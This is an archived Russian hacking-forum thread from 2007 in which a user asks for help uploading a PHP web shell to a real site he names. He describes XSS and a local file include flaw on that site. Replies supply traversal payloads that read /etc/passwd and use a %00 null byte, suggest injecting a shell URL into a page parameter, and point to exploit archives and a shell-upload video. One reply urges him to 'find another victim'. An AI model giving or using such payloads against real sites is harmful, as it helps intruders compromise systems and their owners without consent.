Локальный Инклуд [Архив]

Просмотр полной версии : Локальный Инклуд

NightRider

04.01.2007, 14:22

Здравствуйте!

Такая проблема.

Сайт не фильтрует символы в адресной строке браузера. Что ты туда вводишь ( к примеру, тег изображения ), то этот тег станет картинкой в теле страницы. Вот в чем вопрос.

Мне надо залить файл shell.php на тот хостинг, где стоит сайт!! Но как это сделать - не знаю!

При чем, если в адр. строку браузера вписать index.php?idn=<img src=javascript:alert()>, то выскочит окно!!

Хелп, плиз!!!

D=P=CH= MOD=

04.01.2007, 14:35

index.php?idn=[Адрес шелла]

некатит? 0_о

NightRider

04.01.2007, 14:45

Не получается. Пишет

Warning: main(categories/http://***.ru/shell.php.htm): failed to open stream: No such file or directory in /www/htdocs/index.php on line 440

NightRider

04.01.2007, 14:46

Нужно что-то с тегами!

max_pain89

04.01.2007, 14:58

толпаеп, это лок. инклуд насколько я понимаю... исчи статью Грин_бира про локальный инклуд

aka PSIH

04.01.2007, 15:10

NightRider
Лучше дай ссылку на сайт посматреть, а то так не понятно что у тебя там, толи xss толи лок.инкдул... или вообще все вместе...
Попробуй /../../../../../../../etc/passwd%00 дописать

guest3297

04.01.2007, 15:13

локальный инклуд...

NightRider

04.01.2007, 15:19

сюда (http://bspost.ru)

aka PSIH

04.01.2007, 15:26

там только xss работает...
через лок.инклуд не чего не поимеешь

ice1k

04.01.2007, 16:05

там кстати скуль вместе с инклудом О_о

zl0ba

04.01.2007, 17:42

где увидел скуль? с тегами заморочка :-(

GreenBear

04.01.2007, 17:48

через лок.инклуд не чего не поимеешь
да вы врете все.

aka PSIH

04.01.2007, 17:49

да вы врете все.
Что врём?

GreenBear

04.01.2007, 17:51

http://www.yandex.ru/yandsearch?rpt=rad&text=%EA%E0%EA+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%F2%F C+%EB%EE%EA%E0%EB%FC%ED%FB%E9+%E8%ED%EA%EB%F3%E4

aka PSIH

04.01.2007, 17:54

http://www.yandex.ru/yandsearch?rpt=rad&text=%EA%E0%EA+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%F2%F C+%EB%EE%EA%E0%EB%FC%ED%FB%E9+%E8%ED%EA%EB%F3%E4
баян, я имею введу тот "инклуд" каторый есть на сайте о катором говорить автор... ;)

P.S: Видео по локальному инклуду, и заливки шелла:
http://urussu.org/video/local_php_including.rar

m0nzt3r

04.01.2007, 23:06

Warning: main(categories/http://***.ru/shell.php.htm)
разве не видно, инклудится только то, что в папке categories/, да и в конец добавляется .htm, попробуй shell.php%00

XThread.DSL

06.01.2007, 23:38

попробуй shell.php%00
и че ему это даст? инклудятся только локальные файлы.
автор ,забей на этот сайт и найди себе другую жертву )

m0nzt3r

06.01.2007, 23:50

тьфу не так понял..
и че ему это даст?
http://***.ru/shell.php.htm
мало ли, вдруг в categories/ есть пхп скрипт? ;)

gemaglabin

06.01.2007, 23:53

С локального инклуда за 5 минут а то и меньше получается шелл.Ищите на милворме сплоиты типа Local File Include и смотрите

FraiDex

07.01.2007, 01:55

Если судить по (categories/http://***.ru/shell.php.htm), то он, помойму прикрепляет только html файлы

m0nzt3r

07.01.2007, 20:42

Короче уже постят бред всякий.Стартер не получишь ты выгоду с этого инклуда.